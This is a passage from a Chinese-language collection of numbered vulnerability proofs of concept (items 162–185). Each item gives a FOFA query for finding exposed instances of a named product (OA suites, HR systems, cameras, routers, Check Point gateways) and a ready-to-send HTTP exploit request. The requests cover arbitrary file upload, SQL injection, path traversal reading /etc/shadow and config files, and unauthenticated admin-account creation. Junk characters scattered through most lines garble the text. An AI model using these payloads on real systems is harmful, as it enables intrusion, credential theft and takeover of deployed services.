+ G: w4 h, r% o( I3 u A0 P<tag>3</tag>
# j- I! Z: F5 \5 m: |6 ~</UploadResume>
8 a9 ^' s+ u0 I! n</soap:Body>: S& \ v: H; Y$ U+ R2 h
</soap:Envelope>* I" G7 L) V9 U' o" h9 _
: X7 J( P1 E3 a- X' B
8 L, G% `4 ]6 {% b1 A
http://x.x.x.x/dizxdell.aspx
& n) c0 o- G; R
/ j! b+ m# w! o, M162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传6 Z& v& E# L# W' U7 V7 x5 F4 ^" d
FOFA: app="和丰山海-数字标牌"6 v7 ^3 b; m9 d* r
POST /QH.aspx HTTP/1.1& B7 o P" g$ H2 W9 P T) t! T8 ]8 w
Host: x.x.x.x8 `7 c7 ~" y. _3 F$ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0$ |3 e) z; I. Z# i$ P
Connection: close
6 B8 b6 N. t2 f( n2 N7 hContent-Length: 583
' a/ |; Q }8 \0 p* I- fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
- ?/ [# `2 M ]' m, ^9 }Accept-Encoding: gzip
1 ]0 ^. }7 u$ `& D- U8 ]3 q+ E$ v9 d% s+ t- [: \+ ^
------WebKitFormBoundaryeegvclmyurlotuey4 @( A) p& ^7 {3 `
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx", T: N5 i0 x1 I9 q
Content-Type: application/octet-stream! j, k5 [ v% v& j0 e! A9 Q
- {6 @/ H! @% j" j$ c: h
<% response.write("ujidwqfuuqjalgkvrpqy") %>$ U+ I$ k. y; s( G% H) L) C
------WebKitFormBoundaryeegvclmyurlotuey
; R8 ?$ V4 _' `) L% T uContent-Disposition: form-data; name="action"
6 D# Y9 \) }4 P" `; f3 o, S$ t5 `5 l' R5 _( U# L* x
upload) u2 ^, S2 l B4 a7 [, h2 ~
------WebKitFormBoundaryeegvclmyurlotuey
; f$ S( a6 D. U' u1 _. ?Content-Disposition: form-data; name="responderId"
$ x; u2 g0 e1 k) j; @0 R3 z" ^
: {9 `, v8 o( j: s- MResourceNewResponder& n: Q8 U8 K4 S8 B# U
------WebKitFormBoundaryeegvclmyurlotuey
* X9 \& k( ]1 \' ]$ VContent-Disposition: form-data; name="remotePath") @) @3 `$ i5 B/ I
( u9 V. y9 H; J0 B, r% u" n* t
/opt/resources
9 L& L! F" z1 P& L m------WebKitFormBoundaryeegvclmyurlotuey--
) B4 Q; }8 F" x( U+ j. e+ C% H. P# |# c7 H
8 |; z* w+ }$ A) V* E: Whttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
& r1 D1 ]+ L' t1 g/ s; J8 v- Y! k/ S F2 Q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
9 q/ n1 ? T% r- J0 Y( _* p hFOFA: icon_hash="-795291075"
. Z" J5 ~! [: [5 M0 \3 XPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.13 V, O+ {4 c5 h
Host: x.x.x.x( v0 T' x; U. a2 h3 e9 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36( h; A( I- {# ^) r4 s' D
Connection: close: r$ A, b2 H. A; {' s
Content-Length: 293
0 c! f. h4 b1 L' _+ FAccept: */*
9 t1 f. L4 U/ ZAccept-Encoding: gzip, deflate
0 n) `) K9 _# ^7 n9 ?2 H* J% m8 OAccept-Language: zh-CN,zh;q=0.97 P6 s. C( W( A9 _3 Z
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod0 c- X0 B- Q4 S
; u& `1 B. |4 Z/ Q0 e- o------iiqvnofupvhdyrcoqyuujyetjvqgocod; X+ x+ p1 |* U' z- w9 U
Content-Disposition: form-data; name="name"
, {4 M! ~0 f% S0 _- G# K8 a. ] K) s- y7 U& `4 Q+ N7 C
1.php- {" [) i* U) h+ L' ~' b3 T. u. `
------iiqvnofupvhdyrcoqyuujyetjvqgocod
7 z; o: N. `# ~6 ] A6 DContent-Disposition: form-data; name="upfile"; filename="1.php"8 k/ L6 t7 X: z4 y2 g$ S
Content-Type: image/jpeg
! v) E" X/ y; H. i( T( w; B
4 Y/ I' W# x' M1 e) irvjhvbhwwuooyiioxega) N" U; d- Z6 B+ b0 C
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
: u! P3 p8 X- [0 j. A1 { t7 ]9 P; _2 M$ _, h
L2 q' ~# t; u
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
' G# k$ X e+ s2 @- Z6 F. U: s! hFOFA: title="智慧综合管理平台登入"
# u) j) p4 Z u7 ]1 BPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
4 g3 F& B Z2 r$ hHost: x.x.x.x
& u% Y* i" M5 J. L0 k( p8 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.08 W5 Z5 _4 ^2 d0 }% V5 y
Content-Length: 288
! k; T! M5 o5 Q/ x) Y% YAccept: application/json, text/javascript, */*; q=0.01
0 k2 a7 y# d C3 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,; o6 L9 s3 R/ ] S. z' ?' J% o& X
Connection: close( c" z( `8 B" `
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
2 d3 Z( E( C7 i6 Q" IX-Requested-With: XMLHttpRequest
5 J" L6 @" Y( l6 JAccept-Encoding: gzip
9 T6 ~: m' o7 x
+ P5 f& s- q' D/ t9 }------dqdaieopnozbkapjacdbdthlvtlyl6 Q3 \/ h f% q) R( x9 Y O4 x8 n
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
9 {+ E4 m& l' v$ G' R; B' M$ OContent-Type: image/jpeg. `3 \4 u7 X' T: b; H1 d
* }" n( B8 o% u
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>; o$ I; K" {3 L9 F% @. p
------dqdaieopnozbkapjacdbdthlvtlyl--
% m8 I6 j _+ d0 a
! E2 F7 Q6 m! W
7 `, D- y- k; `1 w$ l' ihttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
5 |! d- g+ l3 w
( O9 |! H" g6 ~ I165. OrangeHRM 3.3.3 SQL 注入3 B3 U& u( q$ w$ o3 W- O C
CVE-2024-36428
1 ?6 B, h5 ]$ HFOFA: app="OrangeHRM-产品"7 N) Q' r4 l9 N% t# \) ?
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
( @5 P, b, _3 A- L& w' \ @+ r6 H) I+ v0 B. E. U( ^+ J
7 U9 U" K. y- n- |4 J7 ` H166. 中成科信票务管理平台SeatMapHandler SQL注入0 }- N+ r( U+ Y J
FOFA:body="技术支持:北京中成科信科技发展有限公司"
) y% Q; j. }; ^3 h; W. S" CPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
. x9 v4 [, Q2 w% KHost:% C) q0 p9 W+ {, {) d0 d
Pragma: no-cache0 p* m6 q, C' {0 C, I6 A3 Q5 N
Cache-Control: no-cache! B- E4 ~5 s+ g; N8 V( d
Upgrade-Insecure-Requests: 1
/ X" S- k) F" D: j& i. WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
; T" N7 p: \: F QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" r! l% S9 D& c9 M, MAccept-Encoding: gzip, deflate
% w) D! {$ A8 s: c: K9 bAccept-Language: zh-CN,zh;q=0.9,en;q=0.85 S1 |$ W% V# o! i9 }
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE+ L8 j9 E* |5 z! t! B$ G
Connection: close
. I" m8 B% Q3 p, L2 a5 `Content-Type: application/x-www-form-urlencoded
3 Y$ u8 Y0 L1 L; o; U7 a( H" OContent-Length: 89
! i% D6 x% t3 _; z& H6 G; C; r6 S2 L. F0 P
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE/ v) `9 C# m \3 ?& {( b3 g* b3 i
" c# J) e) E& X) S3 T
8 x: A3 @7 J& s$ ?& V2 `$ h
167. 精益价值管理系统 DownLoad.aspx任意文件读取; ]) ]! t% o4 }+ T( T
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"9 e% p) t7 F" Y( |. v
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
+ {$ @3 d6 ~) tHost:2 g( Q6 o6 \+ u* K; K7 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 ]* D; f+ j/ g) \3 v* UContent-Type: application/x-www-form-urlencoded
! G7 f3 i. I6 M8 ]! nAccept-Encoding: gzip, deflate3 ]- K6 x1 O4 N- I, N
Accept: */*
: [& h& w4 I" p8 t: NConnection: keep-alive
% d+ Z3 I' L" W9 O3 y2 |6 j$ K" {4 _' n
+ o! s- d& b$ Z$ y
168. 宏景EHR OutputCode 任意文件读取( g- k8 }% o+ \7 j- a
FOFA:app="HJSOFT-HCM". s* k8 H6 S+ M& i. t
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
# x+ S4 j0 t8 g1 l1 }% aHost: your-ip+ z9 B9 T7 y# ]$ S; G3 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ D( X4 D4 i/ g' B" r- ]Content-Type: application/x-www-form-urlencoded, {5 |- V9 R; k" ?% `, r w( O6 l
Connection: close
: A' A7 i, ^6 \1 @1 A$ ^9 S n q: o' p8 q O2 ~
- X& S' {, C" q$ }6 B# j- S) `0 W
7 l8 [0 ^' m6 S# ^( X5 s- f$ i169. 宏景EHR downlawbase SQL注入 u: M6 k" G* l d" [, x4 U7 P
FOFA:app="HJSOFT-HCM"
% c1 E" p3 g3 P' c6 z( mGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
& H" N( F" T# ^: R8 z/ ?) SHost: your-ip
/ J5 O- b/ v; W, NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 G( n% G) {% P4 `! L, {
Accept: */*) S' f. c3 _% }$ v1 {8 r- a' s
Accept-Encoding: gzip, deflate8 O9 ^; V) j& i, ~
Connection: close
2 X1 l1 _$ A( O2 I5 a* l
; K& C2 d( z0 W6 X3 X4 h$ i; C& r* Q8 ^1 D8 G& \
! V: H. M7 v) H9 G- g; F
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
, L2 P) }0 Y( G% W7 C% o2 iFOFA:body="/general/sys/hjaxmanage.js"; h: m: s. [" o
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1* d+ S" Y$ z ?$ n' Z4 U: U% l% e: \# L
Host: balalanengliang k& p- V4 R3 I& M
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 L6 u( m5 s' c+ S7 d* G
Content-Type: application/x-www-form-urlencoded
9 ?1 ]$ G' z4 j2 G2 s( p! u" r7 A2 l9 [/ w
filename=../webapps/ROOT/WEB-INF/web.xml! s& c; c, i7 H" l* s# R b b: y% r' |$ p
2 l4 [- N: r3 U. a8 H: E! u
" I" z* v2 f0 b% E& o: \' r" x171. 通天星CMSV6车载定位监控平台 SQL注入
6 M) f& R# C+ @5 H7 GFOFA:body="/808gps/"2 x$ k* I& K! u, T% W# e8 k: G
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.15 }0 t# }9 j5 W) v
Host: your-ip
; U: u' \; Y3 M( d- A) e. P( nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0+ {3 d5 W ?7 Y" D9 M% q/ O6 |0 j
Accept: */*
% I. L# m! k+ A d) N$ N5 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ]1 G# i! q# T) X
Accept-Encoding: gzip, deflate
- C& p+ _; y: ^* H2 dConnection: close, v( d( M7 H m) ]" z
) s1 J3 P4 ?+ s! G" {2 \, d6 R
! T& k: b5 U% |, Y* ]$ \, |$ {0 g! Q$ d( [5 W0 {( W1 _ Q
172. DT-高清车牌识别摄像机任意文件读取
. s. v/ j: v" G1 ^0 I7 i rFOFA:app="DT-高清车牌识别摄像机"$ B+ N5 y) F7 E; K f) r2 X
GET /../../../../etc/passwd HTTP/1.1
) f& R: r( S; I" d! F% \Host: your-ip
0 J) n# t T! S/ ?& nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) i& ^ w- Z9 H# B+ o
Accept-Encoding: gzip, deflate: Q. S# m1 X5 P
Accept: */*
/ I* F% ]9 T f/ {( tConnection: keep-alive
9 e! Y8 g; ?: e3 U
5 o: j' B$ T0 z* ]8 i+ w
9 g3 K# q; b0 o! i; L, K
$ [7 R) D7 T7 I: b6 ]# R- F) C7 @8 \173. Check Point 安全网关任意文件读取; m1 W. \, g/ G+ K0 i3 j
CVE-2024-24919
8 U; ]' ?# @. q: }. XFOFA:app="Check_Point-SSL-Network-Extender"5 N) z1 U$ u. V+ B! f& w* x
POST /clients/MyCRL HTTP/1.1/ s( |- n) \) Y9 U" ^4 u
Host: your-ip
" X* N* K! L" j% s: cContent-Type: application/x-www-form-urlencoded1 `% A( n2 R: L; i, q
% ]% `9 S0 D8 `. T/ p
aCSHELL/../../../../../../../etc/shadow6 f1 w1 `* C9 I7 i- H& i4 G$ x
* a1 Q. y1 f# K1 _ n0 r5 [& \3 r0 R7 G1 v% m: @
3 m# l6 G4 e3 R U
174. 金和OA C6 FileDownLoad.aspx 任意文件读取" G3 u* @0 |& ^
FOFA:app="金和网络-金和OA"% }4 T' L6 ]% _0 `$ O
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
( Q- R a9 u1 p. c' o7 Q' |Host: your-ip
- E2 m# Q( w8 m5 m8 s6 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; p, z3 @! r8 _1 t" d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 g! Y" E( |6 d" U4 o% ?0 ` N
Accept-Encoding: gzip, deflate, br
$ g; e" ?9 R9 `, N8 SAccept-Language: zh-CN,zh;q=0.9/ |" U. t0 y8 r/ `7 e
Connection: close3 J2 w' t* p' A0 V3 O
4 H# g$ d% K5 f
$ x3 R9 _ }6 Y; ^ G; A% }0 u' C x
. Q3 p w" V0 G% v4 R4 h175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
* y/ \- v" Q1 T) ]1 IFOFA:app="金和网络-金和OA"3 T0 K. U2 K; o# I
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
, p6 N9 A5 r ?7 W5 Y- RHost:
7 H3 v$ g5 z" G3 e4 E3 K( v1 e wUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* T8 ?$ u D! ^" _' X" t8 d9 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 f+ l& U8 H, u! w. e$ |$ IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) B/ F$ Q, j( _1 j, C4 VAccept-Encoding: gzip, deflate6 O1 S# D- P- U0 Q2 w
Connection: close
% B. z# V2 E3 L% h" Z1 aUpgrade-Insecure-Requests: 1
6 m6 z0 _5 D! s& E; U9 ], p
5 [7 s7 e5 E2 M' y5 u- T( n* H
176. 电信网关配置管理系统 rewrite.php 文件上传- D, G7 _' d1 S% D
FOFA:body="img/login_bg3.png" && body="系统登录"
3 ~/ Z1 A3 T9 W: U6 d- S- Y8 pPOST /manager/teletext/material/rewrite.php HTTP/1.1& J) {+ Q$ P7 v8 A
Host: your-ip. a# L- r: }) f/ W) ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 U. q$ p* a; X9 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT7 [, l/ l$ i' L
Connection: close- S, c% F7 k: s0 f4 U1 C
# g- u) k1 L( P, \4 j; S------WebKitFormBoundaryOKldnDPT1 z) {9 C" T ^, O9 }9 W
Content-Disposition: form-data; name="tmp_name"; filename="test.php". u* u3 w5 |4 a3 n
Content-Type: image/png
* O5 r+ U; |2 o% G1 z+ M2 T- [ 4 T, G/ }; c6 k/ e; a+ S0 Q
<?php system("cat /etc/passwd");unlink(__FILE__);?># A& E4 [3 g% ?0 Y8 d. V" t
------WebKitFormBoundaryOKldnDPT/ K* q% [9 s4 q* S
Content-Disposition: form-data; name="uploadtime", I( a! X7 z _ _2 I
$ Z T O8 a8 X( n3 [
3 V2 b# j8 | P, B% y2 Z------WebKitFormBoundaryOKldnDPT--
5 D6 H) |( i* g3 `# m) q' K. H
$ A* L6 E. J# x% m! w% k# Z! T5 O) N# x9 J
' s7 k3 d& ~& F$ m0 j$ _
177. H3C路由器敏感信息泄露
* ~5 R. N+ U: b' H6 X/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg: l* H$ K4 e, a1 p
/userLogin.asp/../actionpolicy_status/../M60.cfg
, Y1 _$ Y$ H5 F* G4 Y( F/userLogin.asp/../actionpolicy_status/../GR8300.cfg; j6 z1 j6 J2 P7 C
/userLogin.asp/../actionpolicy_status/../GR5200.cfg+ m* z+ n5 _" n7 g+ D
/userLogin.asp/../actionpolicy_status/../GR3200.cfg: {3 W4 `; M4 t
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
4 t. B* a: R: m' u% R) L/ i$ y0 i" R/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg+ I7 H2 @( }& j4 ~0 L7 K4 ~# z
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/ U7 j* v1 O; W W; r) }/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
) y8 v/ |' T3 ]( _7 P/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
+ {, @% m9 ~8 ?/userLogin.asp/../actionpolicy_status/../ER5200.cfg
& F9 I* v6 r" L- W7 k/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/ L. E( ?4 j/ p! u5 B& p! }/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
; G, R$ A' T5 ~& j A* M/userLogin.asp/../actionpolicy_status/../ER3260.cfg7 P+ c; U6 `& U" i/ {# k
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
( C- r0 h6 c% c" q7 _, h/userLogin.asp/../actionpolicy_status/../ER3200.cfg$ @4 M p* y* g# ` Y
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
% {: {6 Z! z1 V* m7 D( I3 P$ z U* a# n/userLogin.asp/../actionpolicy_status/../ER3108G.cfg- d `$ Y+ N) ]5 U! G, b& Y2 F7 p
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
6 J. I- l' M k/userLogin.asp/../actionpolicy_status/../ER3100.cfg: Y) u) g/ G: q! R) F: B( l" @: a0 Z
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg9 V) ^' n- B0 A
; B! U) O7 {$ q/ Y1 o8 l
+ a3 I9 C, {: s$ x& i4 P178. H3C校园网自助服务系统-flexfileupload-任意文件上传
" A K5 x2 P0 U* [6 H nFOFA:header="/selfservice"
* g3 G' z0 B3 b3 g: zPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.13 Y* K9 s" E& M
Host:( t( o7 L, E/ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( r6 o8 g( C- u- a9 E
Content-Length: 2524 p( u1 ^% @& D2 G7 a3 ]1 t( f3 g
Accept-Encoding: gzip, deflate
5 }0 u L- y2 S: \Connection: close
3 F- h+ O" N8 @Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l, R1 i! d+ Z: y
-----------------aqutkea7vvanpqy3rh2l1 q% V& G/ [4 e7 \! c" w& F5 s8 x, i
Content-Disposition: form-data; name="12234.txt"; filename="12234"$ I! ^8 s" o* j( ^! g. [" ^
Content-Type: application/octet-stream
0 e2 v$ B' m* w0 f4 ^: h7 tContent-Length: 255
0 q, A5 a/ f. r
; r: I& m- ~# W) f12234* L& A5 t- p" j n0 v! F' G
-----------------aqutkea7vvanpqy3rh2l--
Z2 Y. p5 }/ X1 U. |0 i# t* J/ T/ |' ^% F
! y. n6 Y- m, M" b1 x wGET /imc/primepush/%2e%2e/flex/12234.txt
2 Y7 J: v/ P/ y$ g* _( ~, s$ r3 I7 Q+ u7 m
) [1 v0 Z' \1 ~: t6 T: L O
179. 建文工程管理系统存在任意文件读取
% K/ H6 r% \! kPOST /Common/DownLoad2.aspx HTTP/1.1# y2 L; O) m5 v3 e" s. X
Host: {{Hostname}}8 @- m m1 W3 e/ {. X! p
Content-Type: application/x-www-form-urlencoded
+ F1 V* h$ K: A3 Z" ]User-Agent: Mozilla/5.0
C. Y, S1 S1 A6 v1 h) C! v+ B$ d1 `& u5 t
path=../log4net.config&Name=. j4 `; k( M- W0 w$ s
6 s! V2 t2 q: L
7 q% b3 \! x* [; A/ }180. 帮管客 CRM jiliyu SQL注入5 j0 p, V& j9 y
FOFA:app="帮管客-CRM"
9 {" M' i. V K6 Z; d# WGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1+ f* K; Q6 B1 z3 ]( p. T
Host: your-ip
' q3 q$ x( i7 X/ j& D# v6 e0 W+ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- e8 x& ^! G7 u$ G; ]5 D$ TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) \+ }: p4 ?# b' oAccept-Encoding: gzip, deflate
# W& j: u( U8 V% A; a7 _* EAccept-Language: zh-CN,zh;q=0.9$ h. v$ F, k1 ~( d( l8 `
Connection: close3 @* g1 Q# x ]5 T
. Z( w, Q. H& O4 e) ]! H
( b- g) i' U R7 a. ^181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
/ d; h0 ~( X/ i: s7 u& F1 iFOFA:"PDCA/js/_publicCom.js"+ g9 `7 H1 F4 [. Y" o
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1( Z' U! u3 ?0 C) @
Host: your-ip
0 D1 B. ]6 U1 d! l* jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) L5 R5 k0 Y; A1 p" {! I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: Z F9 A1 `3 U: j- [4 I# IAccept-Encoding: gzip, deflate, br
, A* U9 L! w5 c+ a9 `- _% sAccept-Language: zh-CN,zh;q=0.9
* h0 L# I3 H$ _5 tConnection: close
' c+ T \+ `: ], EContent-Type: application/x-www-form-urlencoded, ?- P9 E/ U# Y) s/ V
! a5 u" r2 Z3 M" }& b
8 j; Y% X+ ]8 J! i
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20, L$ {/ C7 \/ a9 ^0 x7 Z
5 p; O3 G b. l+ b4 l
) R; e" L+ n& q8 k5 A6 f% J
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: O6 ~1 l7 h- H/ [/ q) kFOFA:"PDCA/js/_publicCom.js") ?) g$ X, w) O2 A) t$ N+ T
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
0 R* R9 T" |( S c; z) D: qHost: your-ip8 U8 B9 e- e1 D1 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 P- ^# t4 r+ c" ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& e/ P u, L* N! @, h3 R, \4 k
Accept-Encoding: gzip, deflate, br
9 ~* b. ]% |& I+ kAccept-Language: zh-CN,zh;q=0.9
3 T( r0 s9 ?4 w. SConnection: close
& K: t" s+ I ^$ b6 rContent-Type: application/x-www-form-urlencoded4 B4 y0 ?- K" a7 `5 g2 R4 J
: u Q- c5 J, Y* D {
# I- D' \. j/ G! M( L# {+ N- D Jusername=test1234&pwd=test1234&savedays=19 z5 Z6 C# Q& y8 {6 o
& t3 \7 N6 K& N! T( G8 A5 V
7 Y4 O! H9 O) _& k$ l4 b183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
! n2 Q% L3 L5 }2 r5 x6 UFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"8 m, @8 b& `; t0 G5 d0 U0 T' n
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
) G! o9 o; M# U3 T9 O; k J* c2 y& K) A2 IHost: your-ip& _' o6 v' y* U1 O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* e; Z2 q7 G3 c7 m7 j+ xAccept-Charset: utf-8
. u2 X$ o# t/ t4 i2 p- m9 z) bAccept-Encoding: gzip, deflate" L+ @( s' g3 @1 g) s
Connection: close6 U5 N" z6 T$ l
2 p7 Y: R& F9 `" M+ K; `
8 ~% L2 u% F. d4 I; @! B, s, t% ?184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加6 P3 P! D# p/ R) }0 \8 G: \
FOFA:server="SunFull-Webs"
* f8 C* o/ F; ]- rPOST /soap/AddUser HTTP/1.1# `5 ^$ d( a9 p
Host: your-ip
+ i3 ~6 {3 e9 L# L3 t w GAccept-Encoding: gzip, deflate/ Z! u+ v- M, a* ]% Z" g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 [( P2 _0 |$ HAccept: application/xml, text/xml, */*; q=0.01
7 e2 o) D/ i# l* OContent-Type: text/xml; charset=utf-8$ S1 C4 a$ j9 H" H+ k5 R- k' ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 L( f% e6 s2 ~; `& |( J
X-Requested-With: XMLHttpRequest
. o2 b. P$ F) L1 {4 Q
- L! `/ I- A+ b2 ?5 Y B! k3 T: m1 ?; D. b* b
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')# j( |3 n; C8 R% D6 I; d
- J/ V! W9 D. J/ D
0 z3 e0 F) v! Q, j! t9 T7 p+ r
185. 瑞友天翼应用虚拟化系统SQL注入8 P" Y* n* a' H% R" H* o) \
version < 7.0.5.1+ N# E, T0 `* b3 n) x4 s. i
FOFA:app="REALOR-天翼应用虚拟化系统"
. V% B. j5 h$ C0 V, dGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.18 E9 Y# L3 z W- Q
Host: host
! q( B0 p4 u! F4 v8 N9 B! O0 K, U
